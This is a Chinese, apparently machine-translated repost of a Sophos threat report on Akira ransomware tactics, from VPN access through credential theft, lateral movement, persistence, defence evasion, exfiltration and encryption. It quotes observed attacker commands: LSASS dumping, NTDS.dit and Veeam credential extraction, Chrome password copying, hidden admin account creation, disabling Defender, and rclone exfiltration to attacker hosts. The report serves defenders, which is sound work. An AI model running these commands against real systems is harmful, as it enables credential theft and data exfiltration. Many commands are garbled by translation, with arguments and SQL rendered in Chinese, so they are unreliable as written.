Akira勒索软件团伙及其策略的全面解析

大家好，欢迎来到IT知识分享网。

Akira勒索软件于2023年3月首次出现，是一种快速增长的勒索软件家族，它采用了双重勒索策略、勒索软件即服务（RaaS）分发模式和独特的付款选项。Akira勒索软件组织似乎与现已解散的Conti勒索软件团伙有联系。安全人员表示，该勒索软件虽然与2017年出现的Akira勒索软件家族同名且加密后缀相同，但是两者的源码完全不同，因此判断二者并非同一家族。该新型Akira软件基于Conti勒索软件，实施双重勒索策略，其攻击目的主要是获取经济利益。

Sophos MDR 威胁情报团队此前于 2023 年 5 月发布了博客Akira Ransomware is “bringin’ 1988 back”，大约是在该组织开始运作两个月后。自该勒索软件组织于 3 月份发起首次攻击以来，Akira 已成为中小型企业网络安全领域的强大勒索软件威胁，在其数据泄露网站上发布了数百名据称受害者的信息。

在我们关于 Akira 勒索软件的初步报告之后，Sophos 已对十几起涉及 Akira 的事件做出了响应，影响了各个行业和地区。根据我们的数据集，Akira 主要针对位于欧洲、北美和澳大利亚的政府、制造、技术、教育、咨询、制药和电信行业的组织。

图 1：Sophos 观察到的 Akira 勒索软件攻击的时间线

关键点

• 从 10 月份开始，Sophos 观察到 Akira 攻击者执行仅勒索操作的新趋势，他们在不部署勒索软件或加密系统的情况下从受害者环境中窃取数据
• 在 Sophos 响应的所有 Akira 事件中，Sophos 仅观察到 2023 年 8 月下旬利用 Megazord 勒索软件变体的一个案例
• 在一次事件中，Sophos 观察到 Akira 攻击者利用之前未报告的后门 (exe) 来建立命令和控制 (C2)，这与 Akira 攻击者通常偏好使用两用代理来实现 C2 功能的做法有所不同
• 在针对具有 Sophos 端点保护的组织的攻击中，Sophos 多次观察到 Akira 攻击者试图卸载和/或禁用 Sophos 保护以逃避检测

攻击链

初始访问

Akira 勒索软件攻击者最常见的初始访问模式是通过缺乏多重身份验证 (MFA) 的帐户未经授权登录 VPN。通常，Sophos 观察到 Akira 攻击者专门针对未启用 MFA 的 Cisco VPN 产品，例如 Cisco ASA SSL VPN 或 Cisco AnyConnect。

除了针对缺乏 MFA 之外，Akira 攻击者还利用 VPN 软件本身的已知漏洞。在一种情况下，威胁行为者可能利用组织的 Cisco ASA 中的CVE-2023-20269在受害者的基础设施中建立未经授权的远程访问 VPN 会话。

凭证访问

在获得目标环境的访问权限后，Akira 参与者使用各种方法来获取推进其目标所需的凭据。Sophos 经常观察到参与者尝试对 LSASS 进程内存执行小型转储并获取存储在内存中的其他凭据，如下所示：

cmd /c rundll32.exe C:\windows\System32\comsvc​s.dll, MiniDump 572 C:\ProgramData\lsass.dmp full

Sophos 通过“WIN-CRD-PRC-RUNDLL-COMSVCS-LSASS-1”检测来识别此活动。

攻击者还经常尝试获取存储在 Active Directory 数据库中的凭据，目的是泄露整个域凭据。在某些情况下，我们观察到他们从组织的域控制器复制 SYSTEM 注册表配置单元和 NTDS.dit 文件，以获取用户帐户及其相应域密码哈希的完整列表。在其他事件中，Akira 攻击者利用 ntdsutil 工具对 Active Directory 数据库执行脱机图像捕获。Sophos 通过检测“WIN-CRD-PRC-NTDSUTIL-CREATE-FULL-1”和“WIN-CRD-PRC-VSSADMIN-NTDS-DIT-2”来识别此活动。

我们注意到用于转储 NTDS.dit 文件和 SYSTEM 注册表 Hive 的两个命令：

"cmd.exe" /c C:\ProgramData\Cl.exe -c -i C:\Windows\NTDS\ntds.dit -o C:\programdata\nt.txt "cmd.exe" /c C:\ProgramData\Cl.exe -c -ic:\Windows\System32\config\SYSTEM -o C:\programdata\sys

我们注意到一个用于运行 NTDSUtil 来执行凭证转储的命令：

ntdsutil“ac i ntds”“ifm”“创建完整的c：\ Programdata \ temp \ Crashpad \ Temp \ abc” 

此外，在最近观察到的几个 Akira 案例中，威胁行为者似乎特别关注 Veeam 凭证，并经常利用 Veeam Credential Dumper 脚本将 Veeam 备份服务中存储的凭证转储为明文。在许多情况下，我们发现威胁行为者通过交互式 PowerShell ISE 会话运行开源Veeam-Get-Creds 脚本，以获取域凭据并转向其他主机。Sophos 通过“WIN-PROT-VDL-PUA-VEEAM-CREDENTIAL-DUMPER”检测来识别此活动。

至少在一种情况下，取证证据表明威胁行为者可能利用组织的 Veeam Backup & Replication 组件中的CVE-2023-27532来访问配置数据库中存储的所有加密凭据。威胁行为者检索了 Veeam 凭据，如下所示：

sqlcmd.exe -S localhost,60261 -E -y0 -Q "从 [VeeamBackup 选择顶部 (1000) [id],[用户名],[密码],[usn],[描述],[可见],[change_time_utc] ].[dbo].[凭据]；"

Sophos 还观察到 Akira 攻击者试图获取多个用户缓存的 Chrome 浏览器凭据。在特定情况下，威胁行为者使用供应商帐户访问组织域控制器上的密码列表文档（G:\IT\IT Manual\Password List Part A.doc 和 G:\IT\temp.txt），然后再使用esentutl.exe 使用以下命令从 Google Chrome 用户数据目录创建文件“Login Data”的 .tmp 副本：

esentutl.exe /y "C:\Users\<用户>\AppData\Local\Google\Chrome\用户数据\默认\登录数据" /d "C:\Users\<用户>\AppData\Local\Google\Chrome \用户数据\默认\登录数据.tmp”

在少数情况下，Akira 参与者在收集数据时会访问云帐户的 KeePass 备份代码：

C:\Windows\system32\NOTEPAD.EXE \\<Redacted>\it\KeePass\Department Cloud Accounts - 备份代码\-backup-codes.txt

有时，Akira 演员会使用 Mimikatz 工具并执行各种程序来进行凭据访问，包括绕过 Windows Credential Guard 的 BypassCredGuard.exe 和窃取存储在各种 Web 浏览器中的密码的 WebBrowserPassView.exe：

C:\Users\testrdp\Downloads\Mimik\Pass\BypassCredGuard.exe C:\Users\testrdp\Downloads\Mimik\Pass\WebBrowserPassView.exe C:\Users\testrdp\Downloads\Mimik\Pass\netpass64.exe C:\Users\testrdp\Downloads\Mimik.exe

发现

Sophos 经常观察到 Akira 参与者使用内置 ping 和 net 命令来发现环境中的其他系统并识别目标设备的状态。几乎在所有情况下，Akira 参与者都会枚举 Active Directory 信息，特别是域管理员组和本地管理员组。为了实现这一目标，他们利用了本机命令行实用程序，例如 Get-ADComputer 和 Adfind.exe。

"C:\Windows\system32\cmd.exe" /c net localgroup 管理员 “C:\Windows\system32\net.exe”本地组管理员 获取-ADComputer -过滤器* -属性* | 选择对象已启用、名称、DNSHostName、IPv4Address、操作系统、说明、CanonicalName、servicePrincipalName、LastLogonDate、whenChanged、whenCreated > C:\ProgramData\AdComp[.]txt

Akira 攻击者还使用多个帐户进行网络扫描，并使用 Advanced IP Scanner 和 Netscan 等工具来评估目标的网络拓扑，如下所示：

C:\Users\<用户>\Desktop\netscan_n.exe C:\users\<用户>\appdata\local\temp\3\advanced ip Scanner 2\advanced_ip_scanner.exe C:\Users\<用户>\Desktop\Advanced_IP_Scanner_2.5.4594.1.exe

还有一个特别独特的案例，Sophos 观察到威胁参与者执行程序 ck.exe，该程序是一个可执行文件，似乎与勒索软件二进制 Lck.exe 结合使用。ck.exe 的执行生成了大量遥测数据，记录了勒索软件二进制文件 Lck.exe 访问目标网络内的大量文件和网络共享，其中一些如下所示：

- 启动c:\programdata\lck.exe -p="\\172.16.xx\Development" -n=20 - 启动c:\programdata\lck.exe -p="\\172.16.xx -n=20 - 启动c:\programdata\lck.exe -p="\\172.16.xx\Finance" -n=20 - 启动c:\programdata\lck.exe -p="\\172.16.xx\IT General" -n=20 - 启动c:\programdata\lck.exe -p="\\172.16.xx\Security" -n=20 - 启动c:\programdata\lck.exe -p="\\172.16.xx\高级管理" -n=20 - 启动 c:\programdata\lck.exe -p="\\172.16.xx\Systems" -n=20

横向运动

在整个事件中，Sophos 最常观察到 Akira 参与者使用远程桌面协议 (RDP) 和有效的本地管理员用户帐户在整个目标环境中横向移动。在一次事件中，威胁行为者在初始访问和勒索软件部署之间使用 RDP 超过 100 次，以获得对总共 15 台计算机的访问权限。

他们还通常将 SMB 与 RDP 结合使用进行横向移动，并在某些情况下利用 Impacket 模块 wmiexec 进行横向移动。用于横向移动的其他工具包括 VmConnect.exe，它使用户能够连接到并管理在 Hyper-V 主机上运行的虚拟机 (VM)。在这种情况下，攻击者使用受损的管理员帐户启动 Hyper-V 管理界面并访问组织的虚拟机。

Akiato 使用本地系统权限在远程系统上运行命令。

7045 LocalSystem PSEXESVC %SystemRoot%\PSEXESVC.exe <用户名> 用户模式服务需求启动

Sophos 通过检测“WIN-PROT-VDL-PUA-PSEXEC”来识别此活动。

持久性和权限升级

我们多次观察到 Akira 参与者创建用户帐户并使用 net 命令将帐户添加到启用安全性的本地组，作为在 中建立持久性的一种手段，如下所示：

C:\Windows\system32\net1 user <用户名> <编辑密码> /ADD C:\Windows\system32\net1 本地组管理员 <用户名> /ADD

人们还经常观察到他们重置多个域帐户的密码，以确保他们将来能够登录该帐户。为了在受感染的系统中进一步保持持久性并提升权限，Akira 参与者偶尔会向特殊帐户注册表项添加新创建的用户，Sophos 在检测“WIN-EVA-PRC-HIDE-LOGON-REGISTRY-1”下检测到该用户：

"C:\Windows\system32\reg.exe" 添加 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v <用户名> /t REG_DWORD /d 0 /f

此外，在一项妥协中，Sophos 观察到攻击者创建了一个名为“ESX Admins”的新域组，然后他们将新创建的帐户添加到该组中：

网络组“ESX Admins”/domain/add 网络组“ESX Admins”<用户名> /domain /add 网络用户管理员 P@ssw0rd！/添加 net localgroup“管理员”管理/添加

这些操作是键盘操作的结果，错误输入的 net group 命令列出了“域管理员”组的成员，证明了这一点：

网络组“doamin admins”/dom 网络组“域管理员”/dom

此外，在某些情况下，Sophos XDR 使用服务管理器工具 nssm.exe（位于路径 C:\Windows\tmp\nssm.exe 或 C:\Windows\tmp\nssm-2.24\win64\nssm）检测到威胁参与者.exe）来创建恶意服务“sysmon”，该服务执行 sysmon.exe 并启动 Ngrok 或 Ligolo-ng 等隧道工具来建立对受感染计算机的远程访问。

'' {"EventData":{"AccountName":"LocalSystem","ImagePath":"C:\\Windows\\tmp\nssm.exe", “ServiceName”:“Sysmon”,“ServiceType”:“用户模式服务”,“StartType”:“自动启动”}} "C:\Windows\tmp\sysmon.exe" start --all --region us --config=C:\Windows\tmp\config.yml

Sophos 通过检测“ATK/Ligolo-C”和“Mal/Generic-R”来识别该活动。

防御规避

几乎所有观察到的事件都涉及 Akira 参与者卸载 Sophos 端点保护和其他安全监控工具的行为。大多数情况下，攻击者尝试通过以下可执行文件卸载 Sophos 端点：

C:\Program Files\Sophos\Sophos Endpoint Agent\uninstallgui.exe。 C:\Program Files\Sophos\Sophos Endpoint Agent\SophosUninstall.exe

在一种情况下，Sophos 观察到 Akira 攻击者在执行勒索软件二进制文件前大约一小时试图禁用组织虚拟机上的 Sophos 端点。为此，威胁行为者试图在虚拟机关闭时删除所有 Sophos 服务，目的是导致 Sophos 服务在重新启动时无法加载，并为攻击者创造运行勒索软件可执行文件而不被发现的机会。

还观察到攻击者在多种情况下试图禁用 Windows Defender 实时监控：

设置 MpPreference -DisableRealtimeMonitoring $true

为了进一步逃避防御并隐藏其活动，威胁行为者经常使用 runas 在与登录用户不同的用户上下文中运行命令：

runas /netonly /user:<用户名>\<用户名> cmd

这使得防御者追踪活动变得更加困难。它还可以用于以比验证帐户更高的权限运行。人们还看到，攻击者在活动完成后试图通过删除用于文件收集的工具来避免检测。

命令与控制

对于命令和控制 (C2)，威胁行为者经常使用流行的两用代理 AnyDesk 来建立对受影响组织网络内多个系统的持久远程访问。

“C:\Users\<用户>\Downloads\AnyDesk.exe”--安装“C:\Program Files (x86)\AnyDesk”--start-with-win --create-shortcuts --create-taskbar-icon --create-desktop-icon --install-driver:mirror --install-driver:printer --update-main --svc-conf "C:\Users\<用户>\AppData\Roaming\AnyDesk\service.conf " --sys-conf "C:\Users\<用户>\AppData\Roaming\AnyDesk\system.conf"

在一种情况下，攻击者还执行了用于远程访问的 DWAgent 安装程序，Sophos 在检测“WIN-PER-PRC-DWAGENT-INSTALL-1”时检测到该安装程序：

“C:\Users\<用户>\Downloads\dwagent.exe”

此外，在一次独特的事件中，Sophos 观察到 Akira 攻击者投放了一个定制特洛伊木马 (C:\ProgramData\Microsoft\crome.exe)，该木马与攻击者控制的 IP 地址 170.130.165[.]171 进行通信，并允许攻击者维持立足网络：

“cmd.exe”/c C:\ProgramData\Microsoft\crome.exe

Sophos 对各种 Akira 事件的调查显示，该组织高度重视从目标环境中窃取数据。在几乎所有观察到的案例中，Akira 攻击者都使用各种工具来泄露敏感信息，其中至少有两个案例仅专注于泄露，而没有部署勒索软件二进制文件。

Akira 攻击者支持渗透的主要工具包括 WinRAR、WinSCP、rclone 和 MEGA。在多起事件中，威胁行为者有时通过 Chrome 下载并安装 WinRAR，将收集到的数据压缩到 RAR 存档中以进行泄露：

“C:\Users\<用户>\Downloads\winrar-x64-623.exe”

一旦攻击者将多个文件添加到压缩的 RAR 文件中，他们就会使用各种方法将数据渗透到攻击者控制的 IP。在一种情况下，攻击者通过 explorer.exe 安装了 WinRAR 和 Google Chrome，并将大约 34GB 的数据压缩到“C:\ProgramData\”目录中的多个存档文件中，然后使用 Chrome.exe 将数据渗透到外部 IP 地址 13.107。 42[.]12。RAR 文件名包括前雇员的 Data.rar、Benefits.rar、Workerscomp.rar以及与特定用户相关的文件。

在其他情况下，Akira 攻击者使用 rclone 来泄露信息——在一个案例中，甚至成功通过端口 22 将近 483GB 的数据泄露到攻击者控制的 IP 地址 185.82.216[.]56。在另一起事件中，攻击者使用 rclone 来窃取信息。与目标区域中的近 1,500 个文件进行交互，并通过端口 22 连接到攻击者控制的 IP 104.200.72[.]33。

rclone copy \\192.168.XXX.214\f$ st:"/home/.../.../F" --max-age 1y --exclude "*.{MOV,FIT,fit,FIL,fil ,mp4,AVI,avi,mov,MOV,iso,exe,dll,psd,PSD,7z,7Z,rar,RAR,zip,mox,MOX,wav,WAV,bpm,BPM,mts,MTS,ts,TS ,JS,js,ttf,日志,地图,ai,tmp,TMP,DB,db,mpeg,MPEG,xmp,html,ini,msg,aac,AAC,bak,BAK,DAT,dat,lnk,dwg,indb ,indd,svg,idml,ZIP,CAB,EXE,MSI,bin,XML,MMF,DAT,DS_Store,mpp,mp3,m4a,M4A,pkg,gz,ova,iso,mdb,DLL,MP4,mkv,MKV ,MP3,WMA,g64x,ufdr,vob,VOB,ave,AVE,P01,p01,PO1,po1,dav,DAV,fls,FLS,dist,DIST.c01,C01}" -q --忽略现有- -自动确认 --多线程流 25 --传输 25 –P

Sophos 通过检测“EQL-WIN-EXF-PRC-SUSP-RCLONE-OPTION-1”来识别该活动。

Sophos 还经常观察到 Akira 攻击者通过 MEGA 窃取数据，并且在几次事件中检测到 Google Chrome 连接到以下 MEGA 文件共享服务 IP：

• 99.35[.]22
• 206.25[.]71
• 203.127[.]13
• 99.35[.]202

影响

Sophos 观察到几乎所有情况下都试图执行勒索软件，但有两个例外，其中攻击者仅执行数据泄露，除了删除大量“README.txt”文件外，没有观察到加密迹象。

Akira 攻击者从首次观察到的活动到产生影响（包括渗透和勒索软件部署）在目标环境中停留的时间从不到 1 天到最长 25 天不等。

虽然勒索软件二进制文件在入侵之间存在轻微偏差，但 Sophos 反复观察到 Akira 攻击者以“w.exe”名称部署勒索软件二进制文件，以加密目标网络中的多台计算机：

C:\w[.]exe C:\Users\install\Downloads\w[.]exe \\192.168.XXX.37\c$\w[.]exe

虽然攻击者在攻击期间在某些服务器上手动执行勒索软件，但主要的加密模式是通过 SMB 实现的。勒索软件在感染后，会使用“akira”扩展名加密文件，在受影响的设备上创建名为“akira_readme.txt”的勒索字条，并删除卷影副本。

图 2：Akira 勒索软件注释示例

在一种情况下，Sophos 观察到 Akira 参与者通过 RDP 会话以交互方式将 w.exe 删除到 c:\users\<user>\documents\w.exe，然后将文件移动到 c:\programdata\w.exe，其中执行它是为了加密 C:\ 和 E:\ 驱动器。在这种情况下，攻击者成功加密了一台服务器上的大约 65,000 个文件，以及目标域控制器的 E:\ 驱动器上的大量文件。

Sophos 还观察到攻击者以 Lck.exe、1.exe 和 locker.exe 名称部署 Akira 勒索软件二进制文件。对于名为 1.exe 的勒索软件二进制文件，Akira 攻击者使用 BAT 文件（1.bat、3.bat、5.bat）通过 SMB 共享对受害者系统进行加密，其中包含类似于以下命令的命令：

启动 1.exe -p="\\<已编辑> \C#34; -n=10 启动 1.exe -p="\\ <编辑> \ <编辑>#34; -n=10 启动 1.exe -p="\\ <已编辑> \D#34; -n=10

Sophos 通过检测“Troj/Akira-A”、“Troj/Ransom-GZA”和“Troj/Ransom-GZL”来识别此活动。

概括

在我们 5 月份关于 Akira 勒索软件的博客中，我们详细介绍了两次观察到的 Akira 感染，并提供了有关如何最好地防范威胁组织攻击链每一步的指导。在这篇文章中，我们补充了 Akira 勒索软件的现有知识体系，并提供了有关过去几个月攻击者策略如何演变的更多详细信息。

在过去的几个月中，观察到 Akira 攻击者优先考虑目标环境中的渗透，可能是为了勒索组织泄露的数据。尽管仅在少数案例中注意到，但 Akira 最近在未加密的情况下进行渗透的趋势可能表明攻击者采用了新的策略来勒索受害者，而不会增加勒索软件部署可能引发的检测风险。随着 Akira 继续利用各种凭证访问和防御规避技术，继续密切监控 Akira 勒索软件活动

#评论区出主意大赛##数据泄露##看见人间百态##评论区送祝福##国际网络安全热点资讯##评论区评评理##勒索软件攻击##安全漏洞##黑客#